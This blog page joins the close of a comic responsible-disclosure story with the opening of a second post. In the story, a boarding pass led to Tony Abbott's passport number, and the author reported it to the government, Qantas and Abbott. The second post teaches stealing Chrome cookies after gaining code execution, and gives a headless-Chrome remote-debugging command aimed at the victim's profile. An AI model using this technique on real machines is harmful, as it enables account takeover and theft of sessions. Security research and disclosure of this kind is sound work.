<p>Like 2003’s <em>Finding Nemo</em>, this section was an emotional rollercoaster.</p>
<p>The government was presumably helping Tony Abbott reset his passport number, and making sure his current one wasn’t being used for any of that yucky identity fraud.</p>
<p>But, much like Shannon Noll’s 2004 <a href="https://www.youtube.com/watch?v=uCda5P_f4S8"><em>What About Me?</em></a>, what <em>about</em> me? I really wanted to write a blog post about it, you know? So I could warn people about the non-obvious risk of sharing their boarding passes, and also make dumb and inaccessible references to the early 2000s.</p>
<p>The government people I talked to couldn’t give me permission to write this post, so rather than willingly wandering deeper into the procedurally generated labyrinth of government department email addresses (it’s dark in there), I tried to find Tony Abbott or his staff directly.</p>
<h3 id="calling-everybody-in-australia-one-by-one">Calling everybody in Australia one by one</h3>
<p>I called Tony Abbott’s former political party again, and asked them how to contact him, or his office, or <em>something</em> I’m really having a moment rn. They said they weren’t associated with him anymore, and suggested I call <em>Parliament House</em>, like I was the Queen or something.</p>
<p><img src="https://www.fma.com.au/sites/default/files/imagecache/event_full/uploaded-content/field_f_content_image/aph_from_website.jpg" alt="picture of parliament house" /></p>
<p>In case you don’t know it, Parliament House is sorta like the White House, I think? The Prime Minister lives there and has a nice little garden out the back with a macadamia tree that never runs out, and everyone works in different colourful sections like “Making it so Everyone Gets a Fair Shake of the Sauce Bottle R&D” and “Mateship” and they all wear matching uniforms with lil kangaroo and emu hats, and they all do a little dance every hour on the hour to celebrate another accident-free day in the Prime Minister’s chocolate factory.</p>
<h3 id="calling-parliament-house-i-guess">calling parliament house i guess</h3>
<p>Not really sure what to expect, I called up and was all like “yeah bloody g’day, day for it ay, hot enough for ya?”. Once the formalities were out of the way, I skipped my usual explanation of why I was calling and just asked point-blank if they had Tony Abbott’s contact details.</p>
<p>The person on the phone was casually like “Oh, no, but I can put you through to the <em>Serjeant-at-arms</em>, who can give you the contact details of former members”. I was like “…..okay?????”. Was I supposed to know who that was? Isn’t a Serjeant like an army thing?</p>
<p>But no, the Serjeant-at-arms was just a nice lady who told me “he’s in a temporary office right now, and so doesn’t have a phone number. I can give you an email address or a P.O. box?”. I was like “ok th-thank you your majesty”.</p>
<p>It felt a bit weird just…. emailing the former PM being like “boy do i have bad news for <em>you</em>”, but I figured he probably wouldn’t read it anyway. If it was <em>that</em> easy to get this email address, everyone had it, and so nobody was likely to be reading the inbox.</p>
<p>Spoilers: It didn’t work.</p>
<h3 id="finding-tony-abbotts-staff">Finding Tony Abbott’s staff</h3>
<p>I roll out of bed and stare bleary-eyed into the morning sun, my ultimate nemesis, as Day 40 of not having found Tony Abbott’s staff begins.</p>
<p><em>This</em> time for sure.</p>
<p>Retinas burning, in a moment of determination/desperation/hubris, I went and asked even <em>more</em> people that <em>might</em> know how to contact Tony Abbott’s staff.</p>
<p>I asked a journalist friend, who had the kind of ruthlessly efficient ideas that come from, like, being a professional journalist. They suggested I find Tony Abbott’s former staff from when he was PM, and contact their offices and see if they have his contact details.</p>
<p>It was a strange sounding plan to me, which I thought meant it would <em>definitely</em> work.</p>
<h3 id="wikipedia-stalking">Wikipedia stalking</h3>
<p>Apparently Prime Ministers themselves have “ministers” (not prime), and those are their staff. That’s who I was looking for.</p>
<p><img src="/img/sunburnt-country/ministers.png" alt="Screenshot of Tony Abbott's former staff-medium" />
<em>Big “me and the boys” energy</em></p>
<p>Okay but, the problem was that most of these people are retired now, and the glory days of 2013 are over. Each time I hover over one of their names, I see “so-and-so is a former politician and….” and discard their Wikipedia page like a <a href="https://cdn0.woolworths.media/content/wowproductimages/large/248197.jpg">LeSnak</a> wrapper into the wind.</p>
<p>Eventually though, I saw <em>this</em> minister.</p>
<p><img src="/img/sunburnt-country/scomo-minister.png" alt="Screenshot of Scomo in the list" />
<em>Oh he definitely has an office.</em></p>
<p>That’s the <em>current</em> Prime Minister of Australia (at the time of writing, that is, for all I know we’re three Prime-Ministers deep into 2020 by the time you read this), you know he’s <em>definitely</em> gonna be easier to find.</p>
<h3 id="lets-call-the-prime-ministers-office-i-guess">Let’s call the Prime Minister’s office I guess?</h3>
<p>Easy google of the number, absolutely no emotional journey resulting in my growth as a person this time.</p>
<hr />
<p>When I call, I hear what sounds like two women laughing in the background? One of them answers the phone, slightly out of breath, and says “Hello, Prime Minister’s office?”. I’m like “….hello? Am I interrupting something???”.</p>
<p>I clumsily explain that I know this is Scott Morrison’s office, but I actually was wondering if they had Tony Abbott’s contact details, because it’s for “a time-sensitive media enquiry”<sup id="fnref:magicwords" role="doc-noteref"><a href="#fn:magicwords" class="footnote" rel="footnote">17</a></sup>, and I j-
She interrupts to explain “so Tony Abbott isn’t Prime Minister anymore, this is Scott Morrison’s office” and I’m like “yA I <em>know</em> please I am desperate for these contact details”.</p>
<p>She says “We wouldn’t have that information but I’ll just check for you” and then pauses for like, a long time? Like 15 seconds? I can only wonder what was happening on the other end. Then she says “Oh actually I can give you Tony Abbott’s personal assistant’s number? Is that good?”.</p>
<p>Ummmm YES thanks that’s what I’ve been looking for this whole time? Anyway brb i gotta go be uh a journalist or something.</p>
<h3 id="calling-tony-abbotts-personal-assistants-personal-assistant">Calling Tony Abbott’s personal assistant’s personal assistant</h3>
<p>I fumble with my phone, furiously trying to dial the number.</p>
<p>I ask if I’m speaking to Tony Abbott’s personal assistant. The person on the other end says no, but he <em>is</em> one of Tony Abbott’s staff. It has been a long several months of calling people. The cold ice is starting to thaw. One day, with enough therapy, I may be able to gather the emotional resources necessary to call another government phone number.</p>
<p>I explain the security issue I want to report, and midway through he interrupts with “sorry…. <em>who</em> are you and what’s the organisation you’re calling from?” and I’m like “uhhhh I mean my name is Alex and uhh I’m not calling from any organisation I’m just like a person?? I just found this thing and…”.</p>
<p>The person is mercifully forgiving, and says that he’ll have to call me back. I stress once again that I’m calling to help them, happy to wait to publish until they feel comfortable, and definitely do not warrant the bulk-installation of antivirus products.</p>
<h3 id="calling-tony-abbotts-personal-assistant">Calling Tony Abbott’s personal assistant</h3>
<p>An hour later, I get a call from a number I don’t recognise.</p>
<p>He explains that the guy I talked to earlier was <em>his</em> assistant, and he’s Tony Abbott’s PA. Folks, we made it. It’s as easy as that.</p>
<p>He says he knows what I’m talking about. He’s got <em>the emails</em>. He’s already in the process of getting Tony Abbott a new passport number. This is the stuff. It’s all coming together.</p>
<p>I ask if I can publish a blog post about it, and we agree I’ll send a draft for him to review.</p>
<p>And <em>then</em> he says</p>
<h3 id="these-things-do-interest-him---hes-quite-keen-to-talk-to-you">“These things do interest him - he’s quite keen to talk to you”</h3>
<p>I was like exCUSE me? Tony Abbott, Leader of the <a href="https://en.wikipedia.org/wiki/Abbott_Ministry">69th Ministry of Australia</a>, wants to call me on the <em>phone</em>? I suppose I owe this service to my country?</p>
<p>This story was already completely cooked so sure, whatever. I’d already declared emotional bankruptcy, so nothing was coming as a surprise at this point.</p>
<p>I asked what he wanted to talk about. “Just to pick your brain on these things”. We scheduled a call for 3:30 on Monday.</p>
<h3 id="and-then-tony-abbott-just-calls-me-on-the-phone">And then Tony Abbott just… calls me on the phone?</h3>
<p>Mostly, he wanted to check whether his understanding of how I’d found his passport number was correct (it was). He also wanted to ask me how to learn about “the IT”.</p>
<p>He asked some intelligent questions, like “how much information is in a boarding pass, and what do people like me need to know to be safe?”, and “why can you get a passport number from a boarding pass, but not from a bus ticket?”.</p>
<p>The answer is that boarding passes have your password printed on them<sup id="fnref:airline" role="doc-noteref"><a href="#fn:airline" class="footnote" rel="footnote">18</a></sup>, and bus tickets don’t. You can use that password to log in to a <em>website</em> (widely regarded as a bad move), and at that point all bets are off, websites can just do whatever they want.</p>
<p>He was vulnerable, too, about how computers are harder for him to understand.</p>
<blockquote>
<p>“It’s a funny old world, today I tried to log in to a [Microsoft] Teams meeting (Teams is one of those apps), and the fire brigade uses a Teams meeting. Anyway I got fairly bamboozled, and I can now log in to a Teams meeting in a way I couldn’t before<sup id="fnref:recording" role="doc-noteref"><a href="#fn:recording" class="footnote" rel="footnote">19</a></sup>.</p>
</blockquote>
<blockquote>
<p>It’s, I suppose, a terrible confession of how people my age feel about this stuff.”</p>
</blockquote>
<p>Then the Earth stopped spinning on its axis.</p>
<p>For an instant, time stood still.</p>
<p>Then he said it:</p>
<blockquote>
<p>“You could drop me in the bush and I’d feel perfectly confident navigating my way out, looking at the sun and direction of rivers and figuring out where to go, but this! Hah!”</p>
</blockquote>
<p>This was possibly the most pure and powerful Australian energy a human can possess, and explains how we elected our strongest as our leader. The raw energy did in fact travel through the phone speaker and directly into my brain, killing me instantly.</p>
<p>When I’d collected myself from various corners of the room, he asked if there was a book about the basics of IT, since he wanted to learn about it. That was kinda humanising, since it made me realise that even famous people are just people too.</p>
<p>Anyway I hadn’t heard of a book that was any good, so I told a story about my mum instead.</p>
<h5 id="a-story-about-my-mum-instead">A story about my mum instead</h5>
<p>I said there probably was a book out there about “the basics of IT”, but it wouldn’t help much. I didn’t learn from a book. 13 year old TikTok influencers don’t learn from a book. They just <em>vibe</em>.</p>
<p>My mum<sup id="fnref:himum" role="doc-noteref"><a href="#fn:himum" class="footnote" rel="footnote">20</a></sup> always said when I was growing up that:</p>
<ol>
<li>There were “too many buttons”</li>
<li>She was afraid to press the buttons, because she didn’t know what they did</li>
</ol>
<p>I can understand that, since grown ups don’t have the sheer dumb hubris of a child, and that’s what makes them afraid of the buttons.</p>
<p>Like, when a toddler uses a spoon for the first time, they don’t know what a spoon is, where they are, or who the current Prime Minister is. But they see the spoon, and they see the cereal, and their dumb baby brain is just like “yeA” and they have a red hot go<sup id="fnref:spoon" role="doc-noteref"><a href="#fn:spoon" class="footnote" rel="footnote">21</a></sup>. And like, they get it wrong the first few times, but it doesn’t matter, because they don’t know to be afraid of getting it wrong. So eventually, they get it right.</p>
<p><img src="/img/sunburnt-country/baby-spoon.jpg" alt="yeA" />
<em>leaked footage of me learning how to hack</em></p>
<p>Okay so I didn’t tell the spoon thing to Tony Abbott, but I did tell him what I always told my mum, which was: “Mum you just gotta press <em>all</em> the buttons, to find out what they do”<sup id="fnref:mum" role="doc-noteref"><a href="#fn:mum" class="footnote" rel="footnote">22</a></sup>.</p>
<p>He was like “Oh, you just learn by trial and error”. Exactly! Now that I think about it, it’s a bit scary. We are dumb babies learning to use a spoon for the first time, except if you do it wrong some clown writes a blog post about you. Anyway good luck out there to all you big babies.</p>
<h5 id="asking-to-publish-this-blog-post">Asking to publish this blog post</h5>
<p>When I asked Tony Abbott for permission to publish the post you are reading right now while neglecting your responsibilities, he said “well look Alex, I don’t have a problem with it, you’ve alerted me to something I probably should have known about, so if you wanna do that, go for it”.</p>
<p>At the end of the call, he said “If there’s ever anything you think I need to know, give us a shout”.</p>
<p>Look you gotta hand it to him. That’s exactly the right way to respond when someone tells you about a security problem. Back at the beginning, I was kinda worried that he might misunderstand, and think I was trying to hack him or something, and that I’d be instantly slam dunked into jail. But nope, he was fine with it. And now you, a sweet and honourable blog post browser, get to learn the dangers of posting your boarding pass by the realest of real-world examples.</p>
<p>During the call, I was completely in shock from the lost in the bush thing killing me instantly, and so on. But afterwards, when I looked at the quotes, I realised he just wanted to understand what had happened to him, and more about how technology works. That’s the same kind of curiosity <em>I</em> had, that started this whole surrealist three-act drama. That… wasn’t really what I was expecting from Tony Abbott, but it’s what I found.</p>
<p>The point of this story isn’t to say “wow Tony Abbott got hacked, what a dummy<sup id="fnref:dummy" role="doc-noteref"><a href="#fn:dummy" class="footnote" rel="footnote">23</a></sup>”. The point is that if someone famous can unknowingly post their boarding pass, anyone can.</p>
<p>Anyway that’s why I vote right wing now baybeeeee.</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>☑️ notify someone (The Government) that this happened</li>
<li>☑️ get permission to publish this here blog post</li>
<li>☑️ tell qantas about the security issue so they can fix it</li>
</ul>
<h1 id="act-3-closing-credits">Act 3: Closing credits</h1>
<p><img src="/img/sunburnt-country/donotgetarrestedchallenge2020.png" alt="Do Not Get Arrested Challenge 2020" /></p>
<h2 id="wait-no-what-the-heck-did-i-just-read">Wait no what the heck did I just read</h2>
<p>Yeah look, reasonable.</p>
<h4 id="tl-dr">tl; dr</h4>
<p>Your boarding pass for a flight can sometimes be used to get your passport number. Don’t post your boarding pass or baggage receipt online, keep it as secret as your passport.</p>
<h4 id="how-it-works">How it works</h4>
<p>The Booking Reference on the boarding pass can be used to log in to the airline’s “Manage Booking” page, which sometimes contains the passport number, depending on the airline. I saw that Tony Abbott had posted a photo of his boarding pass on Instagram, and used it to get his passport details, phone number, and internal messages between Qantas flight staff about his flight booking.</p>
<h2 id="why-did-you-do-this">Why did <em>you</em> do this?</h2>
<p>One day, my friend who was also in “the group chat” said “I was thinking…. why didn’t <em>I</em> hack Tony Abbott?<sup id="fnref:understanding" role="doc-noteref"><a href="#fn:understanding" class="footnote" rel="footnote">24</a></sup> And I realised I guess it’s because you have more hubris”.</p>
<p>I was deeply complimented by this, but that’s not the point. The point is that you, too, can have hubris.</p>
<p>You know how they say to commit a crime (which once again I insist did not happen in my case) you need means, motive, and opportunity? Means is the ability to use <code class="language-plaintext highlighter-rouge">right click > Inspect Element</code>, motive is hubris, and opportunity is the dumb luck of having my friend message me the Instagram post.</p>
<p>I know, I’ve been saying “hubris” a lot. I mean “the willingness to risk breaking the rules”. Now hold up, don’t go outside and do crimes (unless it’s really funny). I’m not talking about breaking the <em>law</em>, I’m talking about rules we just follow without realising, like social rules and conventions.</p>
<p>Here’s a simple example. You’re at a sufficiently fancy restaurant, like I dunno, with white tablecloths or something? The waiter asks if you’d like “still or sparkling water?”</p>
<p>If you say “still”, it costs Eleven Dollars. If you say “sparkling”, it costs Eleven Dollars and tastes all gross and fizzy. But if you say “tap water, please”, you just get tap water, what you wanted in the first place?</p>
<p>When I first saw someone do this I was like “you can <em>do</em> that? I just thought you had to pay Eleven Dollars extra at fancy restaurants!”.</p>
<p>It’s not written down anywhere that you can ask for tap water. But when I found out you <em>could</em> do that, and like, nothing bad happens, I could suddenly do it too. Miss me with that Eleven Dollars fizzy water.</p>
<p>Basically, until you’ve broken the rules, the idea that the rules can be broken might just not occur to you. That’s how it felt for me, at least.</p>
<p>In conclusion, to be a hacker u ask for tap water.</p>
<h1 id="faq">FAQ</h1>
<h3 id="why-is-it-bad-for-someone-else-to-have-your-passport-number">Why is it bad for someone else to have your passport number?</h3>
<p>Hey crime gang, welcome back to Identity Fraud tips and tricks with Alex.</p>
<p>A passport is government-issued ID. It’s how you prove you’re you. The fact that you have your passport and I don’t is how you prevent <em>me</em> from convincing the government that I’m you and doing crimes in your name<sup id="fnref:notthat" role="doc-noteref"><a href="#fn:notthat" class="footnote" rel="footnote">25</a></sup>.</p>
<p>Just having the information on the passport is not quite as powerful as a photo of the full physical passport, with your photo and everything.</p>
<p>With your passport number, someone could:</p>
<ul>
<li>Book an international flight as you<sup id="fnref:noflyzone" role="doc-noteref"><a href="#fn:noflyzone" class="footnote" rel="footnote">26</a></sup>.</li>
<li>Apply for anything that requires proof of identity documentation with the government, e.g. Working with children check</li>
<li>Activate a SIM card (and so get an internet connection that’s traceable to you, not them, hiding them from the government)</li>
<li>Create a fake physical passport from a template, with the correct passport number (which they then use to cross a border, open a bank account, or anything)</li>
<li>who knows what else, not me, bc i have never done a crime</li>
</ul>
<h3 id="am-i-a-big-bozo-a-big-honking-goose-if-i-post-my-boarding-pass-on-instagram">Am I a big bozo, a big honking goose, if I post my boarding pass on Instagram?</h3>
<p>Nah, it’s an easy mistake to make. How are you supposed to know not to? It’s not obvious that your boarding pass is secret, like a password. I think it’s on the airline to inform you of the risks you’re taking when you use their stuff.</p>
<p><em>But</em> now that you’ve read this blog post, I regret to inform you that you <em>will</em> in fact be an entire sack of geese if you go and post your boarding pass now.</p>
<h3 id="when-did-all-of-this-happen">When did all of this happen?</h3>
<ul>
<li>March 22 - <a href="https://instagram.com/hontonyabbott">@hontonyabbott</a> posts a picture of a boarding pass and baggage receipt. I log in to the website and get the passport number, phone number, and internal Qantas comments.</li>
<li>March 24 - I contact the Australian Signals Directorate (ASD) and let them know what happened.</li>
<li>March 27 - ASD tells me their investigation is complete, I send them a shakas gif, and they thank me for being a good citizen.</li>
<li>March 29 - I learn from lawyers that I have not done a crime 💯</li>
<li>March 30 - I contact Qantas and tell them about the vulnerability.</li>
<li>May 1 - Tony Abbott calls me, we chat about being dropped in the middle of the bush.</li>
<li>July 17 - <em>Paper Mario: The Origami King</em> is released for Nintendo Switch.</li>
<li>August 21 - Qantas emails me saying the security problem has been fixed.</li>
<li>September 13 - Various friends finish reviewing this post <3</li>
<li>September 15 - Tony Abbott and Qantas review this post.</li>
<li>Today - You read this post instead of letting it read you, nice job you.</li>
</ul>
<h3 id="im-bored-and-tired">I’m bored and tired</h3>
<p>Let me answer that question,,, with a question.</p>
<p>Maybe try drinking some water you big goose. Honk honk, I’m so dehydrated lol. That’s you.</p>
<h3 id="honk-honk-honk-honl">honk honk honk honl</h3>
<p>Yeah, exactly.</p>
<hr />
<p><em>I wrote this because I can’t go back to the Catholic church ever since they excommunicated me in 1633 for insisting the Earth revolves around the sun.</em></p>
<p><em>You can talk to me about it by sliding into my DMs in <a href="https://twitter.com/mangopdf">the tweet zone</a> or, if you must, <a href="mailto:operation.sunburnt.country@gmail.com">email</a>.</em></p>
<hr />
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:groupchat" role="doc-endnote">
<p>It’s one of those group chats where the name is constantly changing and you have no idea who “illegally downloaded plant farmer” is. <a href="#fnref:groupchat" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:kevin07" role="doc-endnote">
<p>Except Kevin Rudd, but that was <em>one time</em> and we were kinda going through some stuff. <a href="#fnref:kevin07" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:hoggemoade" role="doc-endnote">
<p>As for my friend’s nickname being “𝖍𝖔𝖌𝖌𝖊 𝖒𝖔𝖆𝖉𝖊”, I will not be providing context at this time. <a href="#fnref:hoggemoade" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:onbehalf" role="doc-endnote">
<p>On behalf of <em>another</em> friend, my many friends a consequence of my outstanding patriotic efforts towards continuing to avoid subversion of the Commonwealth of Australia. <a href="#fnref:onbehalf" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:nocrime" role="doc-endnote">
<p>To be clear, I didn’t want to go do some fun casual identity fraud, I just wanted to know if he <em>had</em> posted something secret, since uh, someone should probably do something about that if it were true (I insist, as they drag me away). <a href="#fnref:nocrime" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:step3" role="doc-endnote">
<p>You can’t just <em>have</em> step 3. You have to <em>earn it</em>. <a href="#fnref:step3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:lastname" role="doc-endnote">
<p>The last name is printed on the baggage receipt, too. So even if I didn’t know who posted the picture, everything you need to manage the booking is right there on the baggage receipt in a neat little package. <a href="#fnref:lastname" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:name" role="doc-endnote">
<p>Which was actually “Anthony Abbott” #exposed <a href="#fnref:name" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:holt" role="doc-endnote">
<p>Harold Holt was another former Prime Minster and we… lost him? He disappeared while going for a swim one morning. This is not a joke. We named <a href="https://en.wikipedia.org/wiki/Harold_Holt_Memorial_Swimming_Centre">Harold Holt Memorial Swim Centre</a> after him. I repeat, this is <em>not</em> a joke. <a href="#fnref:holt" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:brain" role="doc-endnote">
<p>after years of practice, i now think entirely in lowercase <a href="#fnref:brain" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:calculations" role="doc-endnote">
<p>I’ve always wanted to say that. <a href="#fnref:calculations" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:noplan" role="doc-endnote">
<p>I’m not really sure what my plan was. If I had done a crime, what was I gonna do, not report the passport number being publicly available? <a href="#fnref:noplan" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:underconstruction" role="doc-endnote">
<p>Tony Abbott’s personal assistant later told me that the form was broken because the website was in the middle of some construction/upgrading. <a href="#fnref:underconstruction" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:prize" role="doc-endnote">
<p>Or it <em>was</em>, at least. It’s something else now, since otherwise it wouldn’t be a surprise 👀 <a href="#fnref:prize" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:qantasemail" role="doc-endnote">
<p>One way to fix this problem would be to stop including the passenger’s PNR, passport number, or PNR remarks in the HTTP server’s response for “tripflow.redirect.html”. I’m also planning on publishing a blog post on a personal website describing this issue. If Qantas would prefer that I do not publicly disclose this issue until the issue has been fixed, just let me know. I’m happy to help any way I can, let me know if there’s any more information I can provide. This issue relates to ASD Assist issue OPS-69067 (author’s note: SO CLOSE) with the Australian Signals Directorate. <a href="#fnref:qantasemail" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:spam" role="doc-endnote">
<p>They kept not replying to me, which turned out to be because my emails were getting sent to Junk, presumably because of the illicit hacker keywords contained within. <a href="#fnref:spam" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:magicwords" role="doc-endnote">
<p>These were the magic words my journalist friend told me, for which I will be forever grateful, and keep close to my heart. <a href="#fnref:magicwords" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:airline" role="doc-endnote">
<p>Depending on the airline. <a href="#fnref:airline" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:recording" role="doc-endnote">
<p>I didn’t record our call, I only took notes, so this isn’t a quote, oops. I might have written it down wrong, so nothing in this section has any journalistic integrity, oops again. <a href="#fnref:recording" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:himum" role="doc-endnote">
<p>hi mum <a href="#fnref:himum" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:spoon" role="doc-endnote">
<p>“Nobody gives the baby a knife. You give them a spoon” - Mum, when I showed her this. <a href="#fnref:spoon" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:mum" role="doc-endnote">
<p>But like, I didn’t call <em>him</em> “Mum”, that would be weird, in startling contrast to the rest of this story. <a href="#fnref:mum" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:dummy" role="doc-endnote">
<p>There are many, <em>many</em> blog posts out there roasting Tony Abbott, if that’s what you’re looking for. <a href="#fnref:dummy" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:understanding" role="doc-endnote">
<p>Which was a big misunderstanding, because I stress once again that I did not subvert any Commonwealths of anything, no matter who’s askin’ <a href="#fnref:understanding" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:notthat" role="doc-endnote">
<p>Crimes that I once again stress I have not done. <a href="#fnref:notthat" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:noflyzone" role="doc-endnote">
<p>But not actually fly on it without the physical passport. <a href="#fnref:noflyzone" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<p>mangopdf (Alex Hope): I went on an emotional rollercoaster. A spiritual journey. I sent a lot of emails. I tried so, so much not to get arrested.</p>
<hr />
<h1>Stealing Chrome cookies without a password</h1>
<p>Published 2018-09-26T05:20:12+00:00. Link: /stealing-chrome-cookies-without-root</p>
<p>If you steal someone’s Chrome cookies, you can log in to their accounts on <strong>every website</strong> they’re logged in to.</p>
<p>Normally you need the user’s password to do it, but I found a way to do it without the password. You just need to be able to execute code on their computer. It works by using Chrome’s Remote Debugging Protocol.</p>
<p>If you wanna skip this dumb blog post and just get the demo code, here ya go: <a href="https://github.com/defaultnamehere/cookie_crimes">https://github.com/defaultnamehere/cookie_crimes</a>. There’s also a <a href="https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md">Metasploit module</a>. Don’t spend ‘em all at once.</p>
<p>For how it works and how I found it, you need only <em>find within yourself the strength to scroll this page</em>.</p>
<hr />
<h2 id="step-0-reconsider-your-life-choices">Step 0: Reconsider your life choices</h2>
<p>Imagine that, <em>for some reason</em>, you’ve hacked someone’s computer. I dunno maybe you’re like a spy or something?</p>
<p>Let’s call your fictitious victim, uh, “Naruto”.</p>
<p>Specifically, you’ve got the ability to execute code on Naruto’s computer. That’s like, probably hacking, and you’re already going to be slam jammed into the shadow realm for your crimes, so ya may as well do some more.</p>
<p>One obvious crime you might want to do with this access is to steal Naruto’s Chrome cookies. This would let you log in as him to anything he’s logged in to. Oooooh yeah definitely. Imagine the trouble you could get up to with <em>that</em>.</p>
<p><img src="https://i.imgflip.com/2llk9b.jpg" alt="crimes" /></p>
<h3 id="how-do-cookies-work">How do cookies work?</h3>
<p>You know how you don’t have to log in every time you go to Facebook? How when you go to <code class="language-plaintext highlighter-rouge">facebook.com</code> it just shows you your timeline? How does Facebook know it’s you?</p>
<p>It’s because when you log in to Facebook, Facebook gives you a cookie, which lives on your computer. Next time you go to Facebook, you just <em>show</em> it that cookie, and it lets you in without having to type your password again.</p>
<p>It’s like those wristbands they give you at the club to show you’re of drinking age, except I’m not sure if they still do that because I haven’t been to an Event since the release of Stardew Valley.</p>
<h3 id="and-if-someone-were-tosideways-look-steal-those-cookies">And if someone were to…. <em>sideways look</em> <em>steal</em> those cookies?</h3>
<p>For example, if you had Naruto’s Facebook cookies, it doesn’t matter whether he has a really good password, 2 Factor Authentication, or is particularly good mates with zucc and the boys.</p>
<p>You can just put Naruto’s Facebook cookie in your own browser, and go to <code class="language-plaintext highlighter-rouge">facebook.com</code>, and you’ll see <em>Naruto’s</em> Facebook account logged in.</p>
<p>It’s as easy as that.</p>
<h3 id="chromes-cookie-security">Chrome’s cookie security</h3>
<p>Let’s assume Naruto, the absolute chap, has OS X - but this works on Windows and Linux too.</p>
<p>Naruto’s delicious, tasty Chrome cookies live in a file on his computer. Cleverly, Chrome encrypts his cookies with its own “Chrome Safe Storage” password. This password lives in Naruto’s Login Keychain, so the only way to get the cookies is to unlock the keychain by typing in his password.</p>
<p>This is a perfectly legit way to get someone’s cookies, but the reason we’re here today is I’m pretty sure I found a way to skip all that.</p>
<p><img src="/img/chrome-cookies/diagram.png" alt="diagram" /></p>
<hr />
<p>Why should we have to decrypt the cookies? After all, Naruto can get his own cookies from Chrome without typing his password. Surely there’s a way to just get Chrome to give us the cookies, if we ask nicely?</p>
<h2 id="step-1-run-headless-chrome">Step 1: Run Headless Chrome</h2>
<p>Chrome can run in headless mode now. This means it can run without actually
having a window displayed. Everything happens in the terminal. This is deeply
powerful and probably going to all go wrong one day.</p>
<h3 id="user-data-directories">User data directories</h3>
<p>Chrome stores your cookies, history, deepest secrets, etc. in a <code class="language-plaintext highlighter-rouge">user-data-dir</code>. By default (if
you have no <a href="https://support.google.com/chrome/answer/2364824?co=GENIE.Platform%3DDesktop&hl=en">Chrome Profiles</a>), this will be <code class="language-plaintext highlighter-rouge">$HOME/Library/Application Support/Google/Chrome/</code>.</p>
<p>Needless to say, this directory is The Good Stuff, and we want to be extremely up in it.</p>
<h3 id="enabling-remote-debugging">Enabling remote debugging</h3>
<p>Because we live in a dystopian future, Chrome allows you to remotely control it for debugging and automation reasons.</p>
<p>We’re going to set up a headless Chrome window, using the same <code class="language-plaintext highlighter-rouge">user-data-dir</code>
as our victim.</p>
<p>This is apparently <a href="https://chromium.googlesource.com/chromium/src/+/HEAD/docs/user_data_dir.md#Chrome-Remote-Desktop-sessions-Linux">not possible</a> according to Google.</p>
<blockquote>
<p>“two running Chrome instances cannot share the same user data directory”</p>
</blockquote>
<p>What, you’re not gonna try it just because a <em>webpage</em> told you not to? Of course we are.</p>
<p>Here’s what to run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome \
--headless \
--user-data-dir="$HOME/Library/Application Support/Google/Chrome/" \
https://gmail.com \
--remote-debugging-port=9222
</code></pre></div></div>
<p>This sets remote debugging listening on <code class="language-plaintext highlighter-rouge">localhost:9222</code> (the default port for
Chrome Remote Debugging, now <em>that’s</em> stealthy). It won’t open a browser window, either. We need to tell headless Chrome to browse to something so we can open a tab and start debugging it. You can replace <code class="language-plaintext highlighter-rouge">gmail.com</code> with anything you like.</p>
<p>At this point, you can view any page as if Naruto opened it in a new tab (and so, see all his Facebook messages, in our example). You can do that by adding <code class="language-plaintext highlighter-rouge">--dump-dom</code> to the command above, which will print out the HTML of the page you ask for (<code class="language-plaintext highlighter-rouge">gmail.com</code> above). But that seems a bit tedious, not very stealthy, and we can do better than that if we just <em>believe</em>.</p>
<p>Normally, you’re supposed to like, open a <em>second</em> Chrome, point it at the first Chrome, and use it to debug Chrome itself. Ya we’re not gonna do that. We’re gonna remotely debug Chrome with <code class="language-plaintext highlighter-rouge">curl</code>.</p>
<p>C’mon don’t act like this isn’t absolutely <em>wild</em>. There are some things humans were just never meant to do.</p>
<h2 id="step-2-remotely-debug-headless-chrome">Step 2: Remotely debug Headless Chrome</h2>
<p>Through furious and intense googling, I learned that it might be possible to get cookies out of Chrome by remotely debugging it. So, I set off to learn how Chrome’s Remote Debugging works.</p>
<p>Basically, that remote debugging port (<code class="language-plaintext highlighter-rouge">localhost:9222</code>) is waiting for you to speak some janky websocket protocol, in which you can issue commands to Chrome. If you know how to say the command, Chrome will just…. do it.</p>
<h3 id="sidenote-the-chrome-dev-tools-are-absolutely-loose">Sidenote: The Chrome Dev Tools are absolutely Loose</h3>
